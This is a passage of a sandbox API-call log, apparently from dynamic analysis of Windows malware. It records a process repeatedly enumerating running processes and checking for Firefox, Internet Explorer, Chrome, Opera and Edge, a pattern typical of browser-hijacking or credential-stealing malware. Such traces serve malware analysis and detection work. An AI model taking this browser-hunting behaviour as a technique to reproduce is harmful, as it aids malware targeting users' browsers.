(lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0217.842] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.842] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0217.842] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0217.842] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0217.842] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0217.842] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0217.842] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.842] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0217.843] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0217.843] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0217.843] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0217.843] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0217.843] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.843] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0217.843] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0217.843] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0217.843] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0217.844] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0217.844] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.844] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0217.844] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0217.844] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0217.844] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0217.844] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0217.844] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.844] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0217.845] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0217.845] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0217.845] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0217.845] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0217.845] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.845] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.845] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0217.845] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0217.845] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0217.845] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0217.845] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.845] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.846] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.846] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.846] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.846] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.846] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.846] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0217.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0217.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0217.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0217.846] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0217.847] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.847] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.848] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.848] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.848] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.848] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0217.848] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.848] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.848] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0217.848] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0217.848] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0217.848] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0217.848] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.848] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.849] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.849] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.849] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.849] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0217.849] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.849] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.849] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0217.849] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0217.849] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0217.849] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0217.849] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.850] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0217.850] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0217.850] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0217.850] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0217.850] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.850] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0217.851] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.851] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.852] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0217.852] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.852] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0217.853] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0217.853] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0217.853] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0217.853] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0217.853] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0217.853] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0217.854] CloseHandle (hObject=0xe8) returned 1 [0217.854] Sleep (dwMilliseconds=0x3e8) [0218.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0218.909] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.910] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0218.910] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0218.910] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0218.910] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0218.910] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0218.910] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.910] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0218.910] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0218.910] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0218.910] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0218.911] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0218.911] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.911] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0218.911] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0218.911] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0218.911] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0218.911] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.911] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.912] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0218.912] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0218.912] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0218.912] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0218.912] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.912] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.912] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0218.912] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0218.912] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0218.912] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0218.912] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.912] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.913] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0218.913] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0218.913] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0218.913] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0218.913] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.913] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.913] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0218.913] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0218.913] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0218.913] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0218.914] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.914] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.914] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0218.914] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0218.914] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0218.914] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0218.914] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.914] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.915] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0218.915] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0218.915] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0218.915] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0218.915] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.915] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0218.915] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0218.915] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0218.915] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0218.915] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0218.915] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.915] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.916] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.916] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.917] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.917] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.917] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.917] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.917] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.917] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.917] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.918] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.918] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.918] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.919] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0218.919] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0218.919] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0218.919] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0218.919] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.919] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.919] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.919] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.919] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.919] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.919] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.920] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.920] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0218.920] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0218.920] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0218.920] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0218.920] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0218.920] Process32Next (in: hSnapshot=0xe8, 